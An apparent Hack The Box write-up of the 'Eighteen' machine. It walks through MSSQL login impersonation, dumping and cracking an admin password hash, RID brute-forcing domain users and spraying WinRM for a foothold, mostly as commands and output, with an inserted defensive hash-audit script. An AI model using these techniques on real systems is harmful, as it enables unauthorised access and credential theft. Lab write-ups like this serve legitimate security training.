HTB Eighteen
Enumeration
Given credentials
kevin / iNa2we6haRj2gaw!
TCP Port Scanning using NMAP
└──╼ [★]$ nmap -sCV -p- -T4 10.10.11.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 10:23 CST
Nmap scan report for eighteen.htb (10.10.11.95)
Host is up (0.0024s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Welcome - eighteen.htb
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
| ms-sql-info:
| 10.10.11.95:1433:
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.95:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-12-19T22:56:04+00:00; +6h30m14s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-12-19T22:48:43
|_Not valid after: 2055-12-19T22:48:43
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h30m13s, deviation: 0s, median: 6h30m13s
Endpoint Fuzzing Using NMAP
login [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 626ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 649ms]
register [Status: 200, Size: 2421, Words: 762, Lines: 76, Duration: 546ms]
admin [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 674ms]
features [Status: 200, Size: 2822, Words: 849, Lines: 88, Duration: 547ms]
logout [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 5ms]
dashboard [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]
Subdirectory Fuzzing Using NMAP
Got nothing.
From the nmap results, port 80 (IIS), port 1433 (MSSQL) and port 5985 (WinRM) are open.
Starting with MSSQL on port 1433. The tools used are mssqlclient.py from Impacket and NetExec (nxc).
└──╼ [★]$ mssqlclient.py DOMAIN/kevin:'iNa2we6haRj2gaw!'@10.10.11.95
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (kevin guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
-----------------
master
tempdb
model
msdb
financial_planner
SQL (kevin guest@master)> SELECT name FROM master.sys.syslogins;
name
------
sa
kevin
appdev
We see that there are two other logins, sa and appdev.
But kevin can't access the financial_planner database.
SQL (kevin guest@master)> SELECT name FROM financial_planner.sys.tables;
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
SQL (kevin guest@master)>
Trying with nxc.
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M mssql_priv
MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL_PRIV 10.10.11.95 1433 DC01 [*] kevin can impersonate: appdev
kevin can impersonate appdev, so I tried to switch to the appdev login.
SQL (kevin guest@master)> execute as login = 'appdev'
SQL (appdev appdev@master)>
SQL (appdev appdev@master)> SELECT * FROM financial_planner.dbo.users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
SQL (appdev appdev@master)>
Cracking the password hash gives iloveyou1.
Next, enumerating all domain users with RID brute-forcing.
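The admin row above stores a Werkzeug-style pbkdf2:sha256 hash. As an added example (not part of the writeup or the target application), here is a parser and verifier for that format, plus a small audit that flags weak parameters; the exact layout and the 600000 iteration floor are assumptions taken from the row shown.

```python
import hashlib
import hmac
import secrets

# Format assumed from the admin row above (Werkzeug style):
#   pbkdf2:<digest>:<iterations>$<salt>$<hex digest>
MIN_ITERATIONS = 600000  # assumed policy floor; the row above uses 600000


def parse_pbkdf2_hash(stored):
    """Split a pbkdf2 hash string into (digest, iterations, salt, hex_digest)."""
    try:
        method, salt, hex_digest = stored.split("$")
        tag, digest, iterations = method.split(":")
        iterations = int(iterations)
    except ValueError:
        raise ValueError("not a pbkdf2:<digest>:<iters>$<salt>$<hash> string")
    if tag != "pbkdf2" or digest not in hashlib.algorithms_available:
        raise ValueError("unsupported method: " + method)
    return digest, iterations, salt, hex_digest


def verify_password(password, stored):
    """Recompute PBKDF2 over the stored salt and compare in constant time."""
    digest, iterations, salt, hex_digest = parse_pbkdf2_hash(stored)
    derived = hashlib.pbkdf2_hmac(digest, password.encode(), salt.encode(), iterations)
    return hmac.compare_digest(derived.hex(), hex_digest)


def make_pbkdf2_hash(password, iterations=MIN_ITERATIONS, salt=None):
    """Produce a hash in the same format with a random 16-character salt."""
    if salt is None:
        salt = secrets.token_hex(8)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return "pbkdf2:sha256:%d$%s$%s" % (iterations, salt, derived.hex())


def audit_stored_hash(stored):
    """Findings a defender would raise about one stored hash's parameters."""
    try:
        digest, iterations, salt, _ = parse_pbkdf2_hash(stored)
    except ValueError as exc:
        return ["unparseable: %s" % exc]
    findings = []
    if iterations < MIN_ITERATIONS:
        findings.append("low iteration count: %d" % iterations)
    if len(salt) < 16:
        findings.append("short salt: %d chars" % len(salt))
    if digest in ("md5", "sha1"):
        findings.append("weak digest: " + digest)
    return findings
```

Running audit_stored_hash over every password_hash column value is a quick way to spot rows that were hashed with an older, cheaper configuration.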
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
MSSQL 10.10.11.95 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
MSSQL 10.10.11.95 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.10.11.95 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.10.11.95 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.10.11.95 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.10.11.95 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.10.11.95 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.10.11.95 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.10.11.95 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.10.11.95 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.10.11.95 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.10.11.95 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.10.11.95 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.10.11.95 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.10.11.95 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.10.11.95 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.10.11.95 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.10.11.95 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.10.11.95 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.10.11.95 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.10.11.95 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.10.11.95 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.10.11.95 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.10.11.95 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.10.11.95 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.10.11.95 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.10.11.95 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.10.11.95 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.10.11.95 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.10.11.95 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.10.11.95 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.10.11.95 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.10.11.95 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.10.11.95 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.10.11.95 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.10.11.95 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.10.11.95 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.10.11.95 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.10.11.95 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.10.11.95 1433 DC01 1612: EIGHTEEN\dave.green
Foothold
Password spraying the cracked password against WinRM (port 5985) with the enumerated user list, using nxc winrm.
└──╼ [★]$ nxc winrm 10.10.11.95 -u users.txt -p 'iloveyou1' --no-bruteforce
WINRM 10.10.11.95 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DC01:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DnsAdmins:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\DnsUpdateProxy:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\mssqlvc:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\HR:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\IT:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\Finance:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.10.11.95 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
Got the user adam.scott with password iloveyou1.
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ls
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> ls
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/19/2025 2:47 PM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cat user.txt
e59878ee5413b2f44be497730c211a17
*Evil-WinRM* PS C:\Users\adam.scott\Desktop>
Post-Exploitation
winpeas
Privilege Escalation
BadSuccessor